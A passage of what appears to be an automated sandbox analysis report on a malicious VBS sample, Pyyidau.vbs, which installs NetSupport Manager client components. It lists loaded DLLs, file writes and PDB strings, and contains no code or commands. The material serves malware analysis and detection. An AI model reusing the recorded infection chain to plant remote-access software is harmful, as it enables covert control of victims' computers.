                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: firewallapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: websocket.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: pcictl.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcihooks.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: textshaping.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pciinv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msimg32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: oleacc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: storeinvdll.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windowscodecs.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mfc100u.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: linkinfo.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxdiagn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d11.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d12.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmmbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxgi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wmiclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxgi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msxml6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: tapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Client32[1].iniJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: Pyyidau.vbsStatic file information: File size 8816052 > 1048576
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb4 source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernel32.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701499634.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI3FCC.tmp, 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: winspool.pdbM source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcrt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wldap32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdb source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: pcicfgui_client.exe, 00000024.00000002.2673326583.00000000026C0000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000003.2750993608.0000000007200000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2801948506.0000000008B90000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdbD source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp!D source: MSI3FCC.tmp, 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: protobuf-net.pdb source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: winnsi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: cryptsp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d12.pdbt$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: advapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wsspicli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: secur32.pdbc source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: activeds.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb`ak source: client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: msi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcichek.pdb source: pcicfgui_client.exe, 00000024.00000002.2702316881.000000006F952000.00000002.00000001.01000000.00000019.sdmp, client32.exe, 00000026.00000002.2721376818.000000006F952000.00000002.00000001.01000000.00000019.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2770804463.000000006F952000.00000002.00000001.01000000.00000019.sdmp
                                Source: Binary string: wuser32.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mpr.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d11.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: usp10.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxdiagn.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbE source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkscli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb@ source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: bcrypt.pdbG source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dwmapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdbl source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: WINMMBASE.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb\* source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comdlg32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ws2_32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ole32.pdbe source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winspool.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sfxcab.pdb source: Pyyidau.vbs.exe, 00000003.00000002.1838008382.0000000008C73000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1747546684.0000000001002000.00000040.00000400.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\x64\Release\CloseHookApp64.pdb source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: nsi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\nsmsrc\ReProcessWindowshortcuts\Release\ReProcessWindowshortcuts.pdb source: wscript.exe, 00000005.00000003.2456340850.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winmm.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powrprof.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ole32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: activeds.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: WINMMBASE.pdbH$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msasn1.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: cfgmgr32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: combase.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Windows.Storage.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\wkernel32.pdb source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powershell.pdbUGP source: Pyyidau.vbs.exe, 00000003.00000000.1717706981.0000000000271000.00000020.00000001.01000000.00000005.sdmp
                                Source: Binary string: wsock32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbk, source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdbgI source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wininet.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: UMPDC.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: .pdb8 source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: j.pdb source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\Release_unicode\Licence.pdb source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: combase.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comctl32.pdb! source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winhttp.pdbK source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbg source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleacc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb*n source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shell32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: samcli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcp100.i386.pdb source: pcicfgui_client.exe, 00000024.00000002.2701891569.000000006F801000.00000020.00000001.01000000.00000017.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2720898013.000000006F801000.00000020.00000001.01000000.00000017.sdmp, client32.exe, 00000028.00000002.2769954267.000000006F801000.00000020.00000001.01000000.00000017.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: pcicfgui_client.exe, 00000024.00000002.2701331052.000000006CCC1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2720410623.000000006CCC1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000028.00000002.2769592741.000000006CCC1000.00000020.00000001.01000000.00000018.sdmp
                                Source: Binary string: msvcp_win.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdbD= source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wininet.pdbQ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\DllWrap.pdb source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.dr
